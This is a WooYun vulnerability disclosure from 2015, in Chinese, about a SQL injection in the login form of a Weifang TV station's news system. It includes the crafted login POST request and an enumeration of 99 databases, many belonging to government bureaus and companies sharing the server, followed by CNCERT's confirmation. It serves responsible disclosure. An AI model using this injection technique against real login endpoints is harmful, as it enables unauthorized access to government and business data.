当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0164723

漏洞标题:某电视台新闻信息系统涉及多个政府/企事业单位

相关厂商:cncert国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-12-27 18:58

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-27: 细节已通知厂商并且等待厂商处理中
2015-12-31: 厂商已经确认,细节仅向厂商公开
2016-01-10: 细节向核心白帽子及相关领域专家公开
2016-01-20: 细节向普通白帽子公开
2016-01-30: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

求20Rank

详细说明:

潍坊电视台新闻信息系统存在POST注入
http://**.**.**.**/Home/Login.aspx
POST /tools/submit_ajax.ashx?action=user_login HTTP/1.1
Host: **.**.**.**
Content-Length: 35
Origin: http://**.**.**.**
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Referer: http://**.**.**.**/Home/Login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=f1zks0jge3amuewwlnoo0zkr
txtAccount=admin&txtPassword=123456
available databases [99]:
[*] 03199
[*] 0536yihuo
[*] 0536zx
[*] 1532
[*] 1yuan
[*] aijiaw
[*] aqcmwdb
[*] aqdj
[*] aqga
[*] aqgapj
[*] aqjj
[*] aqpj
[*] BaoMing
[*] bbswffc
[*] bbswftour
[*] bhcmw
[*] bhcmw-qc
[*] boxing
[*] cdzxw
[*] cfv-gov-cn
[*] chunkaijiao
[*] csgh
[*] cyrczx
[*] deyy
[*] htjycs
[*] htpy
[*] hua_oa
[*] ispdata
[*] ispdatanew
[*] jswmb
[*] Learning
[*] lqga
[*] lqxcmw
[*] lupai
[*] master
[*] model
[*] msdb
[*] p-fuwahpark
[*] pbxx
[*] PCS
[*] peixun
[*] pianyifun
[*] pingyi
[*] pygd
[*] pygd-qc
[*] qysapp
[*] qzcmw
[*] qzdwcw
[*] qzsh
[*] ReportServer
[*] ReportServerTempDB
[*] shuhua
[*] sjy
[*] sun-dynasty_oa
[*] szhxq
[*] TakYunClub_DB
[*] tempdb
[*] test
[*] tianzeStudy_jituan
[*] tzrcw
[*] wanli_wfzxw
[*] wcgd
[*] wfcycmw
[*] wfdj
[*] wfdyrs
[*] **.**.**.**
[*] wfflcp
[*] wfgxcjt
[*] wfgxqpy
[*] wfhq
[*] wfjyw
[*] wflghy
[*] wflife
[*] wfly
[*] wfqc2010
[*] wfsqsng
[*] wftzfc
[*] wfyg
[*] wfzgbm
[*] wfzzbnew_09_11_30
[*] wfzzbold
[*] wfzzbXinxiang
[*] wmw
[*] www91546
[*] xcb
[*] xiaoshou
[*] xs-wfcmw
[*] xwxs
[*] ygzy
[*] yinxiangERP
[*] yuxie
[*] zcgaPJ
[*] zgwfhqw
[*] ZhongbaiShop
[*] zhuanjiawuye
[*] zjfw
[*] zzbtp


漏洞证明:

同服网站查询了一下:

QQ截图20151225174111.jpg


涉及潍坊公路局、粮食局、体育局、工商联、市直机关医院、福彩、教育网、旅游网、就业服务网、机构编制网、鲁能·潍坊杯官网、海运网、装饰网、装修网、富华游乐园和多个企业网站的海量数据库

修复方案:

加装防火墙,过滤用户输入

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-31 17:51

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置

最新状态:

暂无